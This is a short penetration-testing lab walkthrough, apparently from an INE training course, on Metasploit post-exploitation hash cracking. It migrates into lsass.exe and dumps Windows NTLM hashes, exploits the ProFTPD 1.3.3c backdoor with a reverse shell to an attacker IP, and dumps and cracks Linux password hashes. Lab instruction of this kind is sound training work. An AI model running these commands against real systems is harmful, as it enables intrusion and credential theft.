Password Hash cracking

We have successfully exploited a badblue server. Migrate the current process into lsass.exe

migrate -N lsass.exe

Dump NTLM hashes

hashdump

Step 8: Verify that the hashes are stored in the MSF database or not.

Command:

background
creds

Step 9: Use an auxiliary ntlm hash cracking module to crack stored NTLM hashes.

Commands:

use auxiliary/analyze/crack_windows
set CUSTOM_WORDLIST /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
exploit

Linux Hash cracking

We will start the postgresql database server on the attacker machine. We are starting postgresql to store all metasploit loot and other sensitive information from the target machine.

/etc/init.d/postgresql start

We have started postgresql database server. Start metasploit framework and exploit proftpd server using exploit/unix/ftp/proftpd_133c_backdoor module.

Make sure to replace LHOST with the IP address of the attacker machine.

msfconsole -q
use exploit/unix/ftp/proftpd_133c_backdoor
set payload payload/cmd/unix/reverse
set RHOSTS demo.ine.local
set LHOST 192.70.114.2
exploit -z

We have exploited the target ftp server. We will use a post exploitation module to dump the system users hashes.

use post/linux/gather/hashdump
set SESSION 1
exploit

Run the provided auxiliary module to find the plain text password of the root user.

use auxiliary/analyze/crack_linux
set SHA512 true
run

PreviousPersistence NextBrute Forcing/ Password Cracking

Last updated 1 day ago